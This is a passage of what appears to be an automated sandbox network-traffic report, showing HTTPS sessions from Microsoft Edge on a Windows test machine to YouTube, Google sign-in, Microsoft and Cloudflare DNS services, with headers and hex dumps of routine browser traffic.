                                                                                        2024-07-24 05:14:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 30 59 4f 71 61 6b 48 36 71 6b 65 49 6c 70 48 44 53 42 43 2f 6d 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: 0YOqakH6qkeIlpHDSBC/mQ.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.649731216.58.206.464432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:32 UTC666OUTGET /account HTTP/1.1
                                                                                        Host: www.youtube.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:32 UTC2479INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 24 Jul 2024 05:14:32 GMT
                                                                                        Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                        P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en-GB for more info."
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Wed, 24-Jul-2024 05:44:32 GMT; Path=/; Secure; HttpOnly
                                                                                        Set-Cookie: YSC=JtV6D88BBxE; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                        Set-Cookie: VISITOR_INFO1_LIVE=SQuWO04_WDM; Domain=.youtube.com; Expires=Mon, 20-Jan-2025 05:14:32 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                        Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgFw%3D%3D; Domain=.youtube.com; Expires=Mon, 20-Jan-2025 05:14:32 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.64973594.245.104.564432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:33 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                        Host: api.edgeoffer.microsoft.com
                                                                                        Connection: keep-alive
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:33 UTC584INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-protobuf; charset=utf-8
                                                                                        Date: Wed, 24 Jul 2024 05:14:33 GMT
                                                                                        Server: Microsoft-IIS/10.0
                                                                                        Set-Cookie: ARRAffinity=4fb3192dd5005df4395924b1d97c9b681e9979439a9624923dc1beb28b17df6b;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                        Set-Cookie: ARRAffinitySameSite=4fb3192dd5005df4395924b1d97c9b681e9979439a9624923dc1beb28b17df6b;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                        Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                        X-Powered-By: ASP.NET


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.649751172.64.41.34432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                        Host: chrome.cloudflare-dns.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 128
                                                                                        Accept: application/dns-message
                                                                                        Accept-Language: *
                                                                                        User-Agent: Chrome
                                                                                        Accept-Encoding: identity
                                                                                        Content-Type: application/dns-message
                                                                                        2024-07-24 05:14:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                        2024-07-24 05:14:37 UTC247INHTTP/1.1 200 OK
                                                                                        Server: cloudflare
                                                                                        Date: Wed, 24 Jul 2024 05:14:37 GMT
                                                                                        Content-Type: application/dns-message
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Content-Length: 468
                                                                                        CF-RAY: 8a816d7eabc9191b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-07-24 05:14:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 8a 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: wwwgstaticcomP#)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.649750172.64.41.34432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                        Host: chrome.cloudflare-dns.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 128
                                                                                        Accept: application/dns-message
                                                                                        Accept-Language: *
                                                                                        User-Agent: Chrome
                                                                                        Accept-Encoding: identity
                                                                                        Content-Type: application/dns-message
                                                                                        2024-07-24 05:14:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                        2024-07-24 05:14:37 UTC247INHTTP/1.1 200 OK
                                                                                        Server: cloudflare
                                                                                        Date: Wed, 24 Jul 2024 05:14:37 GMT
                                                                                        Content-Type: application/dns-message
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Content-Length: 468
                                                                                        CF-RAY: 8a816d7eae124411-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-07-24 05:14:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 04 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: wwwgstaticcom()


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.649752162.159.61.34432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                        Host: chrome.cloudflare-dns.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 128
                                                                                        Accept: application/dns-message
                                                                                        Accept-Language: *
                                                                                        User-Agent: Chrome
                                                                                        Accept-Encoding: identity
                                                                                        Content-Type: application/dns-message
                                                                                        2024-07-24 05:14:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                        2024-07-24 05:14:37 UTC247INHTTP/1.1 200 OK
                                                                                        Server: cloudflare
                                                                                        Date: Wed, 24 Jul 2024 05:14:37 GMT
                                                                                        Content-Type: application/dns-message
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Content-Length: 468
                                                                                        CF-RAY: 8a816d7ede6c43e2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-07-24 05:14:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 02 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: wwwgstaticcom()


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        9192.168.2.64975420.190.160.17443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:38 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/soap+xml
                                                                                        Accept: */*
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                        Content-Length: 4697
                                                                                        Host: login.live.com
                                                                                        2024-07-24 05:14:38 UTC4697OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                        2024-07-24 05:14:38 UTC569INHTTP/1.1 200 OK
                                                                                        Cache-Control: no-store, no-cache
                                                                                        Pragma: no-cache
                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                        Expires: Wed, 24 Jul 2024 05:13:38 GMT
                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                        x-ms-route-info: C558_BL2
                                                                                        x-ms-request-id: 0efb9d26-81fc-4fe8-900d-0b894409a902
                                                                                        PPServer: PPV: 30 H: BL02EPF0001DA29 V: 0
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        Date: Wed, 24 Jul 2024 05:14:38 GMT
                                                                                        Connection: close
                                                                                        Content-Length: 10921
                                                                                        2024-07-24 05:14:38 UTC10921INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.649763142.251.35.1634432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:42 UTC1044OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.6lVpXqFohkI.es5.O/am=BBkMYHQbgUA8nAMfoBQIGQAAAAAAAAAAtAEAAMw/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHuLzpdGtAi2fZZI0B1GZPFa_4BvA/m=_b,_tp HTTP/1.1
                                                                                        Host: www.gstatic.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.150"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:42 UTC934INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Vary: Accept-Encoding, Origin
                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/boq-infra/identity-boq-js-css-signers
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                                                        Report-To: {"group":"boq-infra/identity-boq-js-css-signers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/boq-infra/identity-boq-js-css-signers"}]}
                                                                                        Content-Length: 239554
                                                                                        Date: Wed, 24 Jul 2024 05:14:42 GMT
                                                                                        Expires: Thu, 24 Jul 2025 05:14:42 GMT
                                                                                        Cache-Control: public, immutable, max-age=31536000
                                                                                        Last-Modified: Sat, 20 Jul 2024 20:40:17 GMT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: sffe
                                                                                        X-XSS-Protection: 0
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-07-24 05:14:42 UTC456INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f
                                                                                        Data Ascii: "use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 4d 49 54 0a 2a 2f 0a 76 61 72 20 62 61 61 2c 64 61 61 2c 67 61 61 2c 6c 61 61 2c 6f 61 61 2c 63 62 2c 64 62 2c 67 62 2c 4b 62 2c 4d 62 2c 4e 62 2c 79 61 61 2c 7a 61 61 2c 4f 62 2c 41 61 61 2c 42 61 61 2c 43 61 61 2c 53 62 2c 58 62 2c 47 61 61 2c 49 61 61 2c 4b 61 61 2c 4f 61 61 2c 61 63 2c 63 63 2c 51 61 61 2c 52 61 61 2c 56 61 61 2c 63 62 61 2c 64 62 61 2c 68 62 61 2c 6b 62 61 2c 65 62 61 2c 6a 62 61 2c 69 62 61 2c 67 62 61 2c 66 62 61 2c 6c 62 61 2c 77 63 2c 71 62 61 2c 72 62 61 2c 6f 62 61 2c 73
                                                                                        Data Ascii: se-Identifier: Apache-2.0*//* Copyright 2024 Google, Inc SPDX-License-Identifier: MIT*/var baa,daa,gaa,laa,oaa,cb,db,gb,Kb,Mb,Nb,yaa,zaa,Ob,Aaa,Baa,Caa,Sb,Xb,Gaa,Iaa,Kaa,Oaa,ac,cc,Qaa,Raa,Vaa,cba,dba,hba,kba,eba,jba,iba,gba,fba,lba,wc,qba,rba,oba,s
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 2c 62 2c 63 29 3b 72 65 74 75 72 6e 20 62 3c 30 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 63 68 61 72 41 74 28 62 29 3a 61 5b 62 5d 7d 3b 0a 5f 2e 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 66 3d 30 3b 66 3c 64 3b 66 2b 2b 29 69 66 28 66 20 69 6e 20 65 26 26 62 2e 63 61 6c 6c 28 63 2c 65 5b 66 5d 2c 66 2c 61 29 29 72 65 74 75 72 6e 20 66 3b 72 65 74 75 72 6e 2d 31 7d 3b 5f 2e 78 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 30 2c 5f 2e 74 61 29 28 61 2c 62 29 3e 3d 30 7d 3b 5f 2e 79 61 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                        Data Ascii: ,b,c);return b<0?null:typeof a==="string"?a.charAt(b):a[b]};_.ra=function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)if(f in e&&b.call(c,e[f],f,a))return f;return-1};_.xa=function(a,b){return(0,_.ta)(a,b)>=0};_.ya=function(
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 7d 3b 5f 2e 65 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 3b 28 30 2c 5f 2e 50 61 29 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 63 5b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 61 29 5d 3d 64 7d 29 3b 72 65 74 75 72 6e 20 63 7d 3b 0a 67 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 51 61 3f 61 28 5f 2e 51 61 29 3a 66 61 61 2e 70 75 73 68 28 61 29 7d 3b 5f 2e 53 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 5f 2e 51 61 26 26 5f 2e 52 61 26 26 5f 2e 68 61 61 28 28 30 2c 5f 2e 52 61 29 28 29 29 3b 72 65 74 75 72 6e 20 5f 2e 51 61 7d 3b 5f 2e 68 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 51 61 3d 61 3b 66 61 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 28 5f 2e 51 61 29 7d 29
                                                                                        Data Ascii: };_.eaa=function(a,b){var c={};(0,_.Pa)(a,function(d,e){c[b.call(void 0,d,e,a)]=d});return c};gaa=function(a){_.Qa?a(_.Qa):faa.push(a)};_.Sa=function(){!_.Qa&&_.Ra&&_.haa((0,_.Ra)());return _.Qa};_.haa=function(a){_.Qa=a;faa.forEach(function(b){b(_.Qa)})
